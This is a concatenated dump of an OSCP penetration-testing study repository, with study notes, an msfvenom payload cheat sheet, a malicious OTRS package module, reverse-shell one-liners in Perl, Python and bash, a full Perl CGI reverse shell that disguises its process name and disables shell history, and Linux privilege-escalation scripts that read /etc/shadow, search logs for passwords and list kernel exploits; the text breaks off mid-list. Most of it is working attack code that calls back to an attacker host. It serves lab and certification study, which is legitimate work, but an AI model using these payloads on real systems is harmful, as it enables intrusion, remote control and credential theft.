├── README.md ├── payloads ├── README.md ├── evil.opm ├── one-liners │ ├── README.md │ ├── reverse_shell.pl │ ├── reverse_shell.py │ └── reverse_shell.sh └── reverse_shell.cgi ├── priv_escalation ├── Linux │ ├── LinEnum.sh │ ├── README.md │ ├── escalation_gathering.sh │ └── linuxprivchecker.py └── Windows │ ├── PowerUp.ps1 │ ├── README.md │ ├── Sherlock.ps1 │ ├── elevate_privileges.ps1 │ └── windows-exploit-suggester.py ├── recon_scan ├── dirbust.py ├── dnsrecon.py ├── finger-user-enum.pl ├── ftprecon.py ├── readme.txt ├── reconscan.py ├── samrdump.py ├── smbrecon.py ├── smtp-user-enum.pl ├── smtprecon.py ├── snmprecon.py └── sshrecon.py ├── useful_tricks └── README.md ├── webshells ├── asp │ ├── list.asp │ ├── webshell.asp │ └── webshell.aspx ├── coldfusion │ ├── README.md │ └── cmd.cfml ├── php │ └── cmd.php └── web.config ├── wordlists ├── README.md ├── directory-list-lowercase-2.3-medium.txt ├── dirfuzzing.txt ├── unix_users.txt └── windows_interesting_files └── xpl ├── drupal_prior_7.32.py ├── mempodipper.c ├── openfuck.c ├── proftpd_1_3_3_a.py ├── trans2open.c └── trans2open.pl /README.md: -------------------------------------------------------------------------------- 1 | # Oscp study 2 | 3 | Notes of my Offensive Security Certified Professional (OSCP) study plan. 4 | 5 | **Last update**: 2019-04-10 6 | 7 | ## OSCP-like VMs on Vulnhub: 8 | - Beginner friendly: 9 | - Kioptrix: Level 1 (#1) [ok] 10 | - Kioptrix: Level 1.1 (#2) [ok] 11 | - Kioptrix: Level 1.2 (#3) [ok] 12 | - Kioptrix: Level 1.3 (#4) [ok] 13 | - FristiLeaks: 1.3 [ok] 14 | - Stapler: 1 [ok] 15 | - PwnLab: init [ok] 16 | - Pluck: 1 [ok] 17 | - W1R3S: 1.0.1 [ok] 18 | - Intermediate: 19 | - Kioptrix: 2014 [ok] 20 | - Brainpan: 1 (Part 1 of BO is relevant to OSCP. egghunting is out of scope though) 21 | - Mr-Robot: 1 [ok] 22 | - HackLAB: Vulnix [ok] 23 | - Not so sure (Didn't solve them yet): 24 | - VulnOS: 2 [ok] 25 | - SickOs: 1.2 [ok] 26 | - /dev/random: scream 27 | - pWnOS: 2.0 28 | - SkyTower: 1 29 | - IMF 30 | - Lord of the Root 1.0.1 [ok] 31 | - Tr0ll 32 | - Pegasus 33 | - SkyTower [ok] 34 | - Windows 35 | - Metasploitable 3 36 | - Bobby: 1 (Uses VulnInjector, need to provide you own ISO and key.) 37 | 38 | (credits for **@abatchy**) 39 | 40 | Link to download VMs: http://vulnhub.com 41 | 42 | ## Hackthebox.eu (HTB) 43 | 44 | I strongly recommend the boxes on the hackthebox.eu to study for OSCP cert. HTB has a good set of windows boxes to training: **Devel**, **Optimum**, **Bastard**, **Grandpa**, **Blue**, **Sizzle**, **Reel**. 45 | 46 | My hackthebox profile: https://www.hackthebox.eu/profile/5823. Feel free to contact me there :) 47 | 48 | *PS: It's needed to solve a little "challenge" to obtain the invite.* 49 | 50 | ## Recommended books: 51 | 52 | Penetration Testing: A Hands-On Introduction to Hacking (+Highly recommended for beginners) 53 | Hacking: The Art of Exploitation, 2nd Edition 54 | Rtfm: Red Team Field Manual 55 | The Web Application Hacker's Handbook: Finding and Exploiting Security Flaws 56 | The Hacker Playbook: Practical Guide To Penetration Testing 57 | 58 | ## Stack-based buffer overflow links [must-read]: 59 | 60 | https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/ [Recommended] 61 | http://www.tenouk.com/Bufferoverflowc/Bufferoverflow1.html 62 | https://raw.githubusercontent.com/m0nad/Papers/master/buffer_overflow_iniciantes.txt [PT-BR] 63 | 64 | ## Other interesting links: 65 | 66 | https://forum.hackthebox.eu/discussion/1655/oscp-exam-review-2019-notes-gift-inside/p1 [+ EXCELLENT tool from @21y4d to enumeration... I really recommend it :) ] 67 | https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ [Linux privilege escalation] 68 | http://www.fuzzysecurity.com/tutorials/16.html [Windows privilege escalation] 69 | http://www.abatchy.com/2017/03/how-to-prepare-for-pwkoscp-noob.html 70 | https://www.securitysift.com/offsec-pwb-oscp/ [+Scripts] 71 | http://hackingandsecurity.blogspot.com.br/2016/04/oscp-related-notes.html 72 | http://rtfm-ctf.org/2017/PWN-PATH-TO-OSCP 73 | http://www.techexams.net/forums/security-certifications/110760-oscp-jollyfrogs-tale.html [RECOMMENDED reading] 74 | https://tulpa-security.com/2016/09/19/prep-guide-for-offsecs-pwk/ 75 | 76 | ## My write-ups 77 | 78 | Kioptrix level 1 79 | Kioptrix level 1.1 80 | Kioptrix level 1.2 81 | 82 | -------------------------------------------------------------------------------- /payloads/README.md: -------------------------------------------------------------------------------- 1 | ## Reverse Shell with Msfvenom - Cheatsheet 2 | 3 | ### List payloads 4 | 5 | ``` 6 | msfvenom -l 7 | ``` 8 | 9 | Or 10 | 11 | ``` 12 | msfvenom --list payloads 13 | ``` 14 | 15 | ### Generate a PHP payload 16 | 17 | ``` 18 | msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT= -f raw > shell.php 19 | ``` 20 | 21 | ### Generate a Windows payload 22 | 23 | ##### Meterpreter - Reverse shell (x64): 24 | ``` 25 | msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT= -f exe > reverse.exe 26 | ``` 27 | 28 | ##### Meterpreter - Reverse shell: 29 | ``` 30 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > reverse.exe 31 | ``` 32 | 33 | ##### Meterpreter - Bind shell: 34 | ``` 35 | msfvenom -p windows/meterpreter/bind_tcp RHOST= LPORT= -f exe > bind.exe 36 | ``` 37 | 38 | ##### CMD - Reverse shell: 39 | 40 | ``` 41 | msfvenom -p windows/shell/reverse_tcp LHOST= LPORT= -f exe > prompt.exe 42 | ``` 43 | 44 | ### Generate a Linux payload 45 | 46 | ##### Meterpreter - Reverse shell: 47 | ``` 48 | msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > reverse_bin 49 | ``` 50 | 51 | ### Generate a Python payload 52 | 53 | ``` 54 | msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > reverse.py 55 | ``` 56 | 57 | ### Generate a WAR payload 58 | 59 | ``` 60 | msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > payload.war 61 | ``` 62 | 63 | ### Generate an ASP payload 64 | 65 | ``` 66 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > reverse.asp 67 | ``` 68 | 69 | ### Generate encoded payloads 70 | 71 | ##### Shikata\_ga\_nai 72 | ``` 73 | msfvenom -p -e shikata_ga_nai -i 5 -f raw > reverse 74 | ``` 75 | -------------------------------------------------------------------------------- /payloads/evil.opm: -------------------------------------------------------------------------------- 1 | 2 | 3 | EvilModule 4 | 1.0.0 5 | Offsec 6 | https://github.com/amonsec 7 | GNU GENERAL PUBLIC LICENSE Version 2, June 1991 8 | Evil Module. 9 | EvilModule 10 | 5.x.x 11 | 2017-04-22 11:11:11 12 | opms.otrs.com 13 | 14 | <br> 15 | 1337 Offsec exploit 16 | <br> 17 | ((Unwanted reverse shell coming dude!)) 18 | <br> 19 | 20 | 21 | print qx(bash -i >& /dev/tcp/10.11.0.120/443 0>&1 &); 22 | 23 | 24 | # create the package name 25 | my $CodeModule = 'var::packagesetup::' . $Param{Structure}->{Name}->{Content}; 26 | $Kernel::OM->Get($ModeModule)-%gt;CodeInstall(); 27 | 28 | 29 | my $CodeModule = 'var::packagesetup::' . $Param{Structure}-%gt;{Name}-%gt;{Content}; 30 | $Kernel::OM->Get($CodeModule)->CodeUninstall(); 31 | 32 | 33 | 34 | -------------------------------------------------------------------------------- /payloads/one-liners/README.md: -------------------------------------------------------------------------------- 1 | **Suggestion** 2 | 3 | * Very interesting tool to generate oneliners by [@mthbernardes](https://github.com/mthbernardes/rsg): 4 | 5 | https://github.com/mthbernardes/rsg 6 | -------------------------------------------------------------------------------- /payloads/one-liners/reverse_shell.pl: -------------------------------------------------------------------------------- 1 | perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,":");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' 2 | -------------------------------------------------------------------------------- /payloads/one-liners/reverse_shell.py: -------------------------------------------------------------------------------- 1 | # Reverse shell one-liner python 2 | 3 | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' 4 | -------------------------------------------------------------------------------- /payloads/one-liners/reverse_shell.sh: -------------------------------------------------------------------------------- 1 | # Reverse shell one-liner bash (debian-based) 2 | 3 | #!/bin/bash 4 | 5 | bash -i &0 2>&0 6 | # stdin vindo da conexão interpretado pela bash com stdout e stderr retornado de volta pra conexão (socket tcp) 7 | 8 | # ou.... sh -i 1>&/dev/tcp/127.0.0.1/8080 0<&1 9 | # só funciona em alguns sistemas... 10 | -------------------------------------------------------------------------------- /payloads/reverse_shell.cgi: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl -w 2 | # perl-reverse-shell - A Reverse Shell implementation in PERL 3 | # Copyright (C) 2006 pentestmonkey@pentestmonkey.net 4 | # 5 | # This tool may be used for legal purposes only. Users take full responsibility 6 | # for any actions performed using this tool. The author accepts no liability 7 | # for damage caused by this tool. If these terms are not acceptable to you, then 8 | # do not use this tool. 9 | # 10 | # In all other respects the GPL version 2 applies: 11 | # 12 | # This program is free software; you can redistribute it and/or modify 13 | # it under the terms of the GNU General Public License version 2 as 14 | # published by the Free Software Foundation. 15 | # 16 | # This program is distributed in the hope that it will be useful, 17 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 18 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 19 | # GNU General Public License for more details. 20 | # 21 | # You should have received a copy of the GNU General Public License along 22 | # with this program; if not, write to the Free Software Foundation, Inc., 23 | # 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. 24 | # 25 | # This tool may be used for legal purposes only. Users take full responsibility 26 | # for any actions performed using this tool. If these terms are not acceptable to 27 | # you, then do not use this tool. 28 | # 29 | # You are encouraged to send comments, improvements or suggestions to 30 | # me at pentestmonkey@pentestmonkey.net 31 | # 32 | # Description 33 | # ----------- 34 | # This script will make an outbound TCP connection to a hardcoded IP and port. 35 | # The recipient will be given a shell running as the current user (apache normally). 36 | # 37 | 38 | use strict; 39 | use Socket; 40 | use FileHandle; 41 | use POSIX; 42 | my $VERSION = "1.0"; 43 | 44 | # Where to send the reverse shell. Change these. 45 | my $ip = '10.11.0.44'; 46 | my $port = 1234; 47 | 48 | # Options 49 | my $daemon = 1; 50 | my $auth = 0; # 0 means authentication is disabled and any 51 | # source IP can access the reverse shell 52 | my $authorised_client_pattern = qr(^127\.0\.0\.1$); 53 | 54 | # Declarations 55 | my $global_page = ""; 56 | my $fake_process_name = "/usr/sbin/apache"; 57 | 58 | # Change the process name to be less conspicious 59 | $0 = "[httpd]"; 60 | 61 | # Authenticate based on source IP address if required 62 | if (defined($ENV{'REMOTE_ADDR'})) { 63 | cgiprint("Browser IP address appears to be: $ENV{'REMOTE_ADDR'}"); 64 | 65 | if ($auth) { 66 | unless ($ENV{'REMOTE_ADDR'} =~ $authorised_client_pattern) { 67 | cgiprint("ERROR: Your client isn't authorised to view this page"); 68 | cgiexit(); 69 | } 70 | } 71 | } elsif ($auth) { 72 | cgiprint("ERROR: Authentication is enabled, but I couldn't determine your IP address. Denying access"); 73 | cgiexit(0); 74 | } 75 | 76 | # Background and dissociate from parent process if required 77 | if ($daemon) { 78 | my $pid = fork(); 79 | if ($pid) { 80 | cgiexit(0); # parent exits 81 | } 82 | 83 | setsid(); 84 | chdir('/'); 85 | umask(0); 86 | } 87 | 88 | # Make TCP connection for reverse shell 89 | socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp')); 90 | if (connect(SOCK, sockaddr_in($port,inet_aton($ip)))) { 91 | cgiprint("Sent reverse shell to $ip:$port"); 92 | cgiprintpage(); 93 | } else { 94 | cgiprint("Couldn't open reverse shell to $ip:$port: $!"); 95 | cgiexit(); 96 | } 97 | 98 | # Redirect STDIN, STDOUT and STDERR to the TCP connection 99 | open(STDIN, ">&SOCK"); 100 | open(STDOUT,">&SOCK"); 101 | open(STDERR,">&SOCK"); 102 | $ENV{'HISTFILE'} = '/dev/null'; 103 | system("w;uname -a;id;pwd"); 104 | exec({"/bin/sh"} ($fake_process_name, "-i")); 105 | 106 | # Wrapper around print 107 | sub cgiprint { 108 | my $line = shift; 109 | $line .= "

\n"; 110 | $global_page .= $line; 111 | } 112 | 113 | # Wrapper around exit 114 | sub cgiexit { 115 | cgiprintpage(); 116 | exit 0; # 0 to ensure we don't give a 500 response. 117 | } 118 | 119 | # Form HTTP response using all the messages gathered by cgiprint so far 120 | sub cgiprintpage { 121 | print "Content-Length: " . length($global_page) . "\r 122 | Connection: close\r 123 | Content-Type: text\/html\r\n\r\n" . $global_page; 124 | } 125 | -------------------------------------------------------------------------------- /priv_escalation/Linux/README.md: -------------------------------------------------------------------------------- 1 | ## Links to check 2 | 3 | https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ 4 | -------------------------------------------------------------------------------- /priv_escalation/Linux/escalation_gathering.sh: -------------------------------------------------------------------------------- 1 | #Script to gathering information in a privilege escalation 2 | 3 | #!/bin/sh 4 | echo Distribution and kernel version 5 | cat /etc/issue 6 | uname -a 7 | 8 | echo Mounted filesystems 9 | mount -l 10 | 11 | echo Network configuration 12 | ifconfig -a 13 | cat /etc/hosts 14 | arp 15 | 16 | echo Development tools availability 17 | which gcc 18 | which g++ 19 | which python 20 | 21 | echo Installed packages (Ubuntu) 22 | dpkg -l 23 | 24 | echo Services 25 | netstat -tulnpe 26 | 27 | echo Processes 28 | ps -aux 29 | 30 | echo Scheduled jobs 31 | find /etc/cron* -ls 2>/dev/null 32 | find /var/spool/cron* -ls 2>/dev/null 33 | 34 | echo Readable files in /etc  35 | find /etc -user `id -u` -perm -u=r \ 36 | -o -group `id -g` -perm -g=r \ 37 | -o -perm -o=r \ 38 | -ls 2>/dev/null  39 | 40 | echo SUID and GUID writable files 41 | find / -o -group `id -g` -perm -g=w -perm -u=s \ 42 | -o -perm -o=w -perm -u=s \ 43 | -o -perm -o=w -perm -g=s \ 44 | -ls 2>/dev/null  45 | 46 | echo SUID and GUID files 47 | find / -type f -perm -u=s -o -type f -perm -g=s \ 48 | -ls 2>/dev/null 49 | 50 | echo Writable files outside HOME 51 | mount -l find / -path “$HOME” -prune -o -path “/proc” -prune -o \( ! -type l \) \( -user `id -u` -perm -u=w  -o -group `id -g` -perm -g=w  -o -perm -o=w \) -ls 2>/dev/null 52 | -------------------------------------------------------------------------------- /priv_escalation/Linux/linuxprivchecker.py: -------------------------------------------------------------------------------- 1 | #!/usr/env python 2 | 3 | ############################################################################################################### 4 | ## [Title]: linuxprivchecker.py -- a Linux Privilege Escalation Check Script 5 | ## [Author]: Mike Czumak (T_v3rn1x) -- @SecuritySift 6 | ##------------------------------------------------------------------------------------------------------------- 7 | ## [Details]: 8 | ## This script is intended to be executed locally on a Linux box to enumerate basic system info and 9 | ## search for common privilege escalation vectors such as world writable files, misconfigurations, clear-text 10 | ## passwords and applicable exploits. 11 | ##------------------------------------------------------------------------------------------------------------- 12 | ## [Warning]: 13 | ## This script comes as-is with no promise of functionality or accuracy. I have no plans to maintain updates, 14 | ## I did not write it to be efficient and in some cases you may find the functions may not produce the desired 15 | ## results. For example, the function that links packages to running processes is based on keywords and will 16 | ## not always be accurate. Also, the exploit list included in this function will need to be updated over time. 17 | ## Feel free to change or improve it any way you see fit. 18 | ##------------------------------------------------------------------------------------------------------------- 19 | ## [Modification, Distribution, and Attribution]: 20 | ## You are free to modify and/or distribute this script as you wish. I only ask that you maintain original 21 | ## author attribution and not attempt to sell it or incorporate it into any commercial offering (as if it's 22 | ## worth anything anyway :) 23 | ############################################################################################################### 24 | 25 | # conditional import for older versions of python not compatible with subprocess 26 | try: 27 | import subprocess as sub 28 | compatmode = 0 # newer version of python, no need for compatibility mode 29 | except ImportError: 30 | import os # older version of python, need to use os instead 31 | compatmode = 1 32 | 33 | # title / formatting 34 | bigline = "=================================================================================================" 35 | smlline = "-------------------------------------------------------------------------------------------------" 36 | 37 | print bigline 38 | print "LINUX PRIVILEGE ESCALATION CHECKER" 39 | print bigline 40 | print 41 | 42 | # loop through dictionary, execute the commands, store the results, return updated dict 43 | def execCmd(cmdDict): 44 | for item in cmdDict: 45 | cmd = cmdDict[item]["cmd"] 46 | if compatmode == 0: # newer version of python, use preferred subprocess 47 | out, error = sub.Popen([cmd], stdout=sub.PIPE, stderr=sub.PIPE, shell=True).communicate() 48 | results = out.split('\n') 49 | else: # older version of python, use os.popen 50 | echo_stdout = os.popen(cmd, 'r') 51 | results = echo_stdout.read().split('\n') 52 | cmdDict[item]["results"]=results 53 | return cmdDict 54 | 55 | # print results for each previously executed command, no return value 56 | def printResults(cmdDict): 57 | for item in cmdDict: 58 | msg = cmdDict[item]["msg"] 59 | results = cmdDict[item]["results"] 60 | print "[+] " + msg 61 | for result in results: 62 | if result.strip() != "": 63 | print " " + result.strip() 64 | print 65 | return 66 | 67 | def writeResults(msg, results): 68 | f = open("privcheckout.txt", "a"); 69 | f.write("[+] " + str(len(results)-1) + " " + msg) 70 | for result in results: 71 | if result.strip() != "": 72 | f.write(" " + result.strip()) 73 | f.close() 74 | return 75 | 76 | # Basic system info 77 | print "[*] GETTING BASIC SYSTEM INFO...\n" 78 | 79 | results=[] 80 | 81 | sysInfo = {"OS":{"cmd":"cat /etc/issue","msg":"Operating System","results":results}, 82 | "KERNEL":{"cmd":"cat /proc/version","msg":"Kernel","results":results}, 83 | "HOSTNAME":{"cmd":"hostname", "msg":"Hostname", "results":results} 84 | } 85 | 86 | sysInfo = execCmd(sysInfo) 87 | printResults(sysInfo) 88 | 89 | # Networking Info 90 | 91 | print "[*] GETTING NETWORKING INFO...\n" 92 | 93 | netInfo = {"NETINFO":{"cmd":"/sbin/ifconfig -a", "msg":"Interfaces", "results":results}, 94 | "ROUTE":{"cmd":"route", "msg":"Route", "results":results}, 95 | "NETSTAT":{"cmd":"netstat -antup | grep -v 'TIME_WAIT'", "msg":"Netstat", "results":results} 96 | } 97 | 98 | netInfo = execCmd(netInfo) 99 | printResults(netInfo) 100 | 101 | # File System Info 102 | print "[*] GETTING FILESYSTEM INFO...\n" 103 | 104 | driveInfo = {"MOUNT":{"cmd":"mount","msg":"Mount results", "results":results}, 105 | "FSTAB":{"cmd":"cat /etc/fstab 2>/dev/null", "msg":"fstab entries", "results":results} 106 | } 107 | 108 | driveInfo = execCmd(driveInfo) 109 | printResults(driveInfo) 110 | 111 | # Scheduled Cron Jobs 112 | cronInfo = {"CRON":{"cmd":"ls -la /etc/cron* 2>/dev/null", "msg":"Scheduled cron jobs", "results":results}, 113 | "CRONW": {"cmd":"ls -aRl /etc/cron* 2>/dev/null | awk '$1 ~ /w.$/' 2>/dev/null", "msg":"Writable cron dirs", "results":results} 114 | } 115 | 116 | cronInfo = execCmd(cronInfo) 117 | printResults(cronInfo) 118 | 119 | # User Info 120 | print "\n[*] ENUMERATING USER AND ENVIRONMENTAL INFO...\n" 121 | 122 | userInfo = {"WHOAMI":{"cmd":"whoami", "msg":"Current User", "results":results}, 123 | "ID":{"cmd":"id","msg":"Current User ID", "results":results}, 124 | "ALLUSERS":{"cmd":"cat /etc/passwd", "msg":"All users", "results":results}, 125 | "SUPUSERS":{"cmd":"grep -v -E '^#' /etc/passwd | awk -F: '$3 == 0{print $1}'", "msg":"Super Users Found:", "results":results}, 126 | "HISTORY":{"cmd":"ls -la ~/.*_history; ls -la /root/.*_history 2>/dev/null", "msg":"Root and current user history (depends on privs)", "results":results}, 127 | "ENV":{"cmd":"env 2>/dev/null | grep -v 'LS_COLORS'", "msg":"Environment", "results":results}, 128 | "SUDOERS":{"cmd":"cat /etc/sudoers 2>/dev/null | grep -v '#' 2>/dev/null", "msg":"Sudoers (privileged)", "results":results}, 129 | "LOGGEDIN":{"cmd":"w 2>/dev/null", "msg":"Logged in User Activity", "results":results} 130 | } 131 | 132 | userInfo = execCmd(userInfo) 133 | printResults(userInfo) 134 | 135 | if "root" in userInfo["ID"]["results"][0]: 136 | print "[!] ARE YOU SURE YOU'RE NOT ROOT ALREADY?\n" 137 | 138 | # File/Directory Privs 139 | print "[*] ENUMERATING FILE AND DIRECTORY PERMISSIONS/CONTENTS...\n" 140 | 141 | fdPerms = {"WWDIRSROOT":{"cmd":"find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep root", "msg":"World Writeable Directories for User/Group 'Root'", "results":results}, 142 | "WWDIRS":{"cmd":"find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep -v root", "msg":"World Writeable Directories for Users other than Root", "results":results}, 143 | "WWFILES":{"cmd":"find / \( -wholename '/home/homedir/*' -prune -o -wholename '/proc/*' -prune \) -o \( -type f -perm -0002 \) -exec ls -l '{}' ';' 2>/dev/null", "msg":"World Writable Files", "results":results}, 144 | "SUID":{"cmd":"find / \( -perm -2000 -o -perm -4000 \) -exec ls -ld {} \; 2>/dev/null", "msg":"SUID/SGID Files and Directories", "results":results}, 145 | "ROOTHOME":{"cmd":"ls -ahlR /root 2>/dev/null", "msg":"Checking if root's home folder is accessible", "results":results} 146 | } 147 | 148 | fdPerms = execCmd(fdPerms) 149 | printResults(fdPerms) 150 | 151 | pwdFiles = {"LOGPWDS":{"cmd":"find /var/log -name '*.log' 2>/dev/null | xargs -l10 egrep 'pwd|password' 2>/dev/null", "msg":"Logs containing keyword 'password'", "results":results}, 152 | "CONFPWDS":{"cmd":"find /etc -name '*.c*' 2>/dev/null | xargs -l10 egrep 'pwd|password' 2>/dev/null", "msg":"Config files containing keyword 'password'", "results":results}, 153 | "SHADOW":{"cmd":"cat /etc/shadow 2>/dev/null", "msg":"Shadow File (Privileged)", "results":results} 154 | } 155 | 156 | pwdFiles = execCmd(pwdFiles) 157 | printResults(pwdFiles) 158 | 159 | # Processes and Applications 160 | print "[*] ENUMERATING PROCESSES AND APPLICATIONS...\n" 161 | 162 | if "debian" in sysInfo["KERNEL"]["results"][0] or "ubuntu" in sysInfo["KERNEL"]["results"][0]: 163 | getPkgs = "dpkg -l | awk '{$1=$4=\"\"; print $0}'" # debian 164 | else: 165 | getPkgs = "rpm -qa | sort -u" # RH/other 166 | 167 | getAppProc = {"PROCS":{"cmd":"ps aux | awk '{print $1,$2,$9,$10,$11}'", "msg":"Current processes", "results":results}, 168 | "PKGS":{"cmd":getPkgs, "msg":"Installed Packages", "results":results} 169 | } 170 | 171 | getAppProc = execCmd(getAppProc) 172 | printResults(getAppProc) # comment to reduce output 173 | 174 | otherApps = { "SUDO":{"cmd":"sudo -V | grep version 2>/dev/null", "msg":"Sudo Version (Check out http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=sudo)", "results":results}, 175 | "APACHE":{"cmd":"apache2 -v; apache2ctl -M; httpd -v; apachectl -l 2>/dev/null", "msg":"Apache Version and Modules", "results":results}, 176 | "APACHECONF":{"cmd":"cat /etc/apache2/apache2.conf 2>/dev/null", "msg":"Apache Config File", "results":results} 177 | } 178 | 179 | otherApps = execCmd(otherApps) 180 | printResults(otherApps) 181 | 182 | print "[*] IDENTIFYING PROCESSES AND PACKAGES RUNNING AS ROOT OR OTHER SUPERUSER...\n" 183 | 184 | # find the package information for the processes currently running 185 | # under root or another super user 186 | 187 | procs = getAppProc["PROCS"]["results"] 188 | pkgs = getAppProc["PKGS"]["results"] 189 | supusers = userInfo["SUPUSERS"]["results"] 190 | procdict = {} # dictionary to hold the processes running as super users 191 | 192 | for proc in procs: # loop through each process 193 | relatedpkgs = [] # list to hold the packages related to a process 194 | try: 195 | for user in supusers: # loop through the known super users 196 | if (user != "") and (user in proc): # if the process is being run by a super user 197 | procname = proc.split(" ")[4] # grab the process name 198 | if "/" in procname: 199 | splitname = procname.split("/") 200 | procname = splitname[len(splitname)-1] 201 | for pkg in pkgs: # loop through the packages 202 | if not len(procname) < 3: # name too short to get reliable package results 203 | if procname in pkg: 204 | if procname in procdict: 205 | relatedpkgs = procdict[proc] # if already in the dict, grab its pkg list 206 | if pkg not in relatedpkgs: 207 | relatedpkgs.append(pkg) # add pkg to the list 208 | procdict[proc]=relatedpkgs # add any found related packages to the process dictionary entry 209 | except: 210 | pass 211 | 212 | for key in procdict: 213 | print " " + key # print the process name 214 | try: 215 | if not procdict[key][0] == "": # only print the rest if related packages were found 216 | print " Possible Related Packages: " 217 | for entry in procdict[key]: 218 | print " " + entry # print each related package 219 | except: 220 | pass 221 | 222 | # EXPLOIT ENUMERATION 223 | 224 | # First discover the avaialable tools 225 | print 226 | print "[*] ENUMERATING INSTALLED LANGUAGES/TOOLS FOR SPLOIT BUILDING...\n" 227 | 228 | devTools = {"TOOLS":{"cmd":"which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp 2>/dev/null", "msg":"Installed Tools", "results":results}} 229 | devTools = execCmd(devTools) 230 | printResults(devTools) 231 | 232 | print "[+] Related Shell Escape Sequences...\n" 233 | escapeCmd = {"vi":[":!bash", ":set shell=/bin/bash:shell"], "awk":["awk 'BEGIN {system(\"/bin/bash\")}'"], "perl":["perl -e 'exec \"/bin/bash\";'"], "find":["find / -exec /usr/bin/awk 'BEGIN {system(\"/bin/bash\")}' \\;"], "nmap":["--interactive"]} 234 | for cmd in escapeCmd: 235 | for result in devTools["TOOLS"]["results"]: 236 | if cmd in result: 237 | for item in escapeCmd[cmd]: 238 | print " " + cmd + "-->\t" + item 239 | print 240 | print "[*] FINDING RELEVENT PRIVILEGE ESCALATION EXPLOITS...\n" 241 | 242 | # Now check for relevant exploits (note: this list should be updated over time; source: Exploit-DB) 243 | # sploit format = sploit name : {minversion, maxversion, exploitdb#, language, {keywords for applicability}} -- current keywords are 'kernel', 'proc', 'pkg' (unused), and 'os' 244 | sploits= { "2.2.x-2.4.x ptrace kmod local exploit":{"minver":"2.2", "maxver":"2.4.99", "exploitdb":"3", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 245 | "< 2.4.20 Module Loader Local Root Exploit":{"minver":"0", "maxver":"2.4.20", "exploitdb":"12", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 246 | "2.4.22 "'do_brk()'" local Root Exploit (PoC)":{"minver":"2.4.22", "maxver":"2.4.22", "exploitdb":"129", "lang":"asm", "keywords":{"loc":["kernel"], "val":"kernel"}}, 247 | "<= 2.4.22 (do_brk) Local Root Exploit (working)":{"minver":"0", "maxver":"2.4.22", "exploitdb":"131", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 248 | "2.4.x mremap() bound checking Root Exploit":{"minver":"2.4", "maxver":"2.4.99", "exploitdb":"145", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 249 | "<= 2.4.29-rc2 uselib() Privilege Elevation":{"minver":"0", "maxver":"2.4.29", "exploitdb":"744", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 250 | "2.4 uselib() Privilege Elevation Exploit":{"minver":"2.4", "maxver":"2.4", "exploitdb":"778", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 251 | "2.4.x / 2.6.x uselib() Local Privilege Escalation Exploit":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"895", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 252 | "2.4/2.6 bluez Local Root Privilege Escalation Exploit (update)":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"926", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"bluez"}}, 253 | "<= 2.6.11 (CPL 0) Local Root Exploit (k-rad3.c)":{"minver":"0", "maxver":"2.6.11", "exploitdb":"1397", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 254 | "MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit":{"minver":"0", "maxver":"99", "exploitdb":"1518", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"mysql"}}, 255 | "2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit":{"minver":"2.6.13", "maxver":"2.6.17.4", "exploitdb":"2004", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 256 | "2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (2)":{"minver":"2.6.13", "maxver":"2.6.17.4", "exploitdb":"2005", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 257 | "2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (3)":{"minver":"2.6.13", "maxver":"2.6.17.4", "exploitdb":"2006", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 258 | "2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (4)":{"minver":"2.6.13", "maxver":"2.6.17.4", "exploitdb":"2011", "lang":"sh", "keywords":{"loc":["kernel"], "val":"kernel"}}, 259 | "<= 2.6.17.4 (proc) Local Root Exploit":{"minver":"0", "maxver":"2.6.17.4", "exploitdb":"2013", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 260 | "2.6.13 <= 2.6.17.4 prctl() Local Root Exploit (logrotate)":{"minver":"2.6.13", "maxver":"2.6.17.4", "exploitdb":"2031", "lang":"c", 